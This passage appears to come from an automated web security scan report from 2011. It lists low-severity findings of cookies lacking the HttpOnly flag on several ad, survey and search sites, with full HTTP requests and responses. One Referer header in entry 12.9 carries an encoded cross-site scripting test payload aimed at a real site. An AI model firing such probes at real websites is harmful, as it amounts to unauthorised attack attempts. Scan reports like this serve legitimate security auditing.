GET /a/track?t=l&l=loc%3Dhttp%3A%2F%2Fblekko.com%2Fws%2Fwpp%2Bcompanies%3Bv_l%3D1%3Bv_ul%3D0%3B&s=1316288666565&i=undefined&y=0 HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/wpp+companies X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=3; t=1316288660893
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=15 Set-Cookie: sessionid=996256394; path=/; expires=Sat, 17 Sep 2011 18:43:16 GMT Cache-Control: no-cache, max-age=0 Expires: -1 Pragma: no-cache Content-Length: 0 X-Blekko-PT: 4cd8d7c9b015bfbcb9f99a206cddf5a0
|
12.3. http://blekko.com/autocomplete
previous
next
Summary
| Severity: |
Low |
| Confidence: |
Firm |
| Host: |
http://blekko.com |
| Path: |
/autocomplete |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- sessionid=830337972; path=/; expires=Sat, 17 Sep 2011 18:43:08 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autocomplete?query=wpp HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=3; t=1316220316418
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:08 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Keep-Alive: timeout=15 Vary: Accept-Encoding Set-Cookie: sessionid=830337972; path=/; expires=Sat, 17 Sep 2011 18:43:08 GMT Cache-Control: max-age=43200 Expires: Sun, 18 Sep 2011 02:43:08 GMT Vary: Accept-Encoding X-Blekko-PT: 855aaf303f14a0aa9fc97c82869447c8 Content-Length: 185
{"suggestions":["wpp","wpp /techblogs","wpp /news-magazine","wpp /tech","wppi","wpp group","wpp group /news-magazine","wpp group /techblogs","wpp group /reviews","wppsi"],"query":"wpp"} |
12.4. http://www.peopleschoice.com/pca/polls/poll.jsp
previous
next
Summary
| Severity: |
Low |
| Confidence: |
Firm |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/polls/poll.jsp |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://wonderwall.msn.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:04:03 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; Path=/ Via: 1.1 pca-www-02.sparkred.com Vary: Accept-Encoding Content-Length: 27744 Connection: close
<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo ...[SNIP]...
|
12.5. http://adserver.teracent.net/tase/ad
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://adserver.teracent.net |
| Path: |
/tase/ad |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tase/ad?AdBoxType=16&url=nissan.dfa&inv=doubleclick&rnd=1316283170160&esc=0&CustomQuery=dcp%3Domd%26oem%3Dnissan%26eaid%3D242388130%26epid%3D61484958%26esid%3D598068%26ecid%3D43899957%26campId%3D5290464%26model%3DAS%26 HTTP/1.1 Host: adserver.teracent.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548509_135234331_as3100_vew|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|
|
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 13:12:06 GMT Content-Length: 3406
resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316265127233_137611811_as3107_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316265127233_137611811_as3 ...[SNIP]...
|
12.6. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://adserver.teracent.net |
| Path: |
/tase/redir/1316265127233_137611811_as3107_imp/vew |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tase/redir/1316265127233_137611811_as3107_imp/vew?q=H4sIAAAAAAAAAFWQMU_EMAyF_4pjx4kjZffUAQYk0LViZEKkXHWMVWlQBW3vr-OeWNjyLL_3vvhhe_zZyvCR7_b3YRuvVV_LsOQnTi4IBGqCJ2JiaW6T6FwTKdoD5KRLzYBg2gMFQuwAQwRIAN3YI7jQLWvR8mVbDiJ4ChGFtc_urwWYJUamBjwmNF9zTBKITTiyFzlarpdc9_PnNk_bMn3rkImTZ4YoAULQpbcgtAQSOUyhudUFD4ZCcijb9AkjsD-U-EhCgogn3cplzuSM2EkHoXOuc6mDpOP5oGZjAB8sW0tGl_Qtz5N9mzEZmw-tzsWkJScWn1qdxrW81OxJnLG0uu513vLzfat1Knlfa6v7vObr0vfj1dy9ub0kF807jybs2JiSVevQ_7-u_gK9m_7CrAEAAA==&act=vew&idx=[0]&rnd=2023178134&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1 Host: adserver.teracent.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|
|
Response
HTTP/1.1 204 No Content Server: Apache-Coyote/1.1 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase Date: Sat, 17 Sep 2011 13:12:07 GMT
|
12.7. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913131/10/400008095899/decide.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CS1=deleted; expires=Fri, 17 Sep 2010 14:37:36 GMT; path=/; domain=.questionmarket.com
- CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-17d1a66403974a1bf62d24ec5_43741102-3-54_400008095899-10-1; expires=Wed, 07 Nov 2012 06:37:37 GMT; path=/; domain=.questionmarket.com
- ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-G*?|M-0; expires=Wed, 07-Nov-2012 06:37:37 GMT; path=/; domain=.questionmarket.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d913131/10/400008095899/decide.php?ord=1316288110 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:37 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b202.dl Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:37:36 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-17d1a66403974a1bf62d24ec5_43741102-3-54_400008095899-10-1; expires=Wed, 07 Nov 2012 06:37:37 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-G*?|M-0; expires=Wed, 07-Nov-2012 06:37:37 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
GIF89a.............!.......,...........D..; |
12.8. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913132/5/400008029877/decide.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CS1=deleted; expires=Fri, 17 Sep 2010 13:05:10 GMT; path=/; domain=.questionmarket.com
- CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; expires=Wed, 07 Nov 2012 05:05:11 GMT; path=/; domain=.questionmarket.com
- ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0; expires=Wed, 07-Nov-2012 05:05:11 GMT; path=/; domain=.questionmarket.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d913132/5/400008029877/decide.php?ord=1316282753 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:05:11 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b203.dl Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:05:10 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; expires=Wed, 07 Nov 2012 05:05:11 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0; expires=Wed, 07-Nov-2012 05:05:11 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
GIF89a.............!.......,...........D..; |
12.9. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d917547/10/43064321/decide.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CS1=deleted; expires=Fri, 17 Sep 2010 14:35:51 GMT; path=/; domain=.questionmarket.com
- CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1%5D%5D%3E%3E_43741102-3-7_43064321-10-1; expires=Wed, 07 Nov 2012 06:35:52 GMT; path=/; domain=.questionmarket.com
- ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_924563-`#?|M-0_913131-y'?|M-0_917547-Q#?|M-x3; expires=Wed, 07-Nov-2012 06:35:52 GMT; path=/; domain=.questionmarket.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d917547/10/43064321/decide.php?ord=1316287903 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate=home.ascxe81bd%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E384de482b57 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:35:52 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b102.dl Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:35:51 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1%5D%5D%3E%3E_43741102-3-7_43064321-10-1; expires=Wed, 07 Nov 2012 06:35:52 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_924563-`#?|M-0_913131-y'?|M-0_917547-Q#?|M-x3; expires=Wed, 07-Nov-2012 06:35:52 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
GIF89a.............!.......,...........D..; |
12.10. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d924563/3/43741102/decide.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CS1=deleted; expires=Fri, 17-Sep-2010 14:34:01 GMT; path=/; domain=.questionmarket.com
- CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-2_400008095899-10-1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com
- ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-y'?|M-0_924563-`#?|M-(1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d924563/3/43741102/decide.php?ord=1316287868 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:34:02 GMT Server: Apache/2.2.14 (Ubuntu) Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC" DL_S: a203 Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 14:34:01 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-2_400008095899-10-1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-y'?|M-0_924563-`#?|M-(1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
GIF89a.............!.......,...........D..; |
12.11. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d924563/3/43741105/decide.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CS1=deleted; expires=Fri, 17 Sep 2010 13:02:55 GMT; path=/; domain=.questionmarket.com
- CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-2_924563-1-4; expires=Wed, 07 Nov 2012 05:02:56 GMT; path=/; domain=.questionmarket.com
- ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-D9; expires=Wed, 07-Nov-2012 05:02:56 GMT; path=/; domain=.questionmarket.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d924563/3/43741105/decide.php?ord=1316281820 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:02:56 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b101.dl Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:02:55 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-2_924563-1-4; expires=Wed, 07 Nov 2012 05:02:56 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-D9; expires=Wed, 07-Nov-2012 05:02:56 GMT; path=/; domain=.questionmarket.com; Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif
GIF89a.............!.......,...........D..; |
12.12. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:40 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b203.dl Set-Cookie: LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com Content-Length: 875 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ ...[SNIP]...
|
12.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/surv_lastpage_disq.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:41:39 GMT; path=/; domain=.questionmarket.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
